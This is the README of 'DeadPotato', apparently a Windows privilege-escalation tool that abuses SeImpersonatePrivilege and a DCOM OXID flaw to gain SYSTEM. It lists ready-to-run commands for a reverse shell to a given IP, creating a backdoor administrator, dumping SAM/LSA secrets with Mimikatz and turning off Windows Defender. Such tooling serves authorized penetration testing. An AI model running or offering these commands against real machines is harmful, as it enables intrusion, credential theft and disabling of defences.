❗ Usage of this program under an unauthorized context is strictly forbidden.
❗ The author(s) of DeadPotato do not take any responsibility for any harm caused to systems.
❗ Use with caution.
C:\Users\lypd0> GodPotato.exe
⠀⢀⣠⣤⣤⣄⡀⠀ _ _
⣴⣿⣿⣿⣿⣿⣿⣦ | \ _ _ _||_) _ _|_ _ _|_ _
⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_)
⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0
⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =-
⠀⠀⠀
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Example Usage(s):
-={ deadpotato.exe -MODULE [ARGUMENTS] }=-
-> deadpotato.exe -cmd "whoami"
-> deadpotato.exe -rev 192.168.10.30:9001
-> deadpotato.exe -exe paylod.exe
-> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
-> deadpotato.exe -shell
-> deadpotato.exe -mimi sam
-> deadpotato.exe -defender off
-> deadpotato.exe -sharphound
(*) Available Modules:
- cmd: Execute a command as NT AUTHORITY\SYSTEM.
- rev: Attempts to establish a reverse shell connection to the provided host
- exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
- newadmin: Create a new administrator user on the local system.
- shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
- mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
- defender: Either enables or disables Windows Defender's real-time protection.
- sharphound: Attempts to collect domain data for BloodHound.
The `SeImpersonatePrivilege` right is enabled in your context? With DeadPotato, it is possible to achieve maximum privileges on the local system.
The tool will attempt to start an elevated process running in the context of the `NT AUTHORITY\SYSTEM` user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.
In order to use DeadPotato, the SeImpersonatePrivilege right must be enabled in the current context. In order to verify this, the `whoami /priv` command can be executed.
If there privilege is disabled, exploitation is not possible in the current context.
C:\Users\lypd0> whoami /priv
<...SNIP...>
SeImpersonatePrivilege Impersonate a client after authentication Enabled
<...SNIP...>
This Project "DeadPotato" is a tool built on the source code of the masterpiece "GodPotato" by BeichenDream.
If you like this project, make sure to also go show support to [the original project :
https://github.com/BeichenDream/GodPotato
💥 BeichenDream,
💥 Benjamin DELPY `gentilkiwi`,
💥 BloodHound Developers.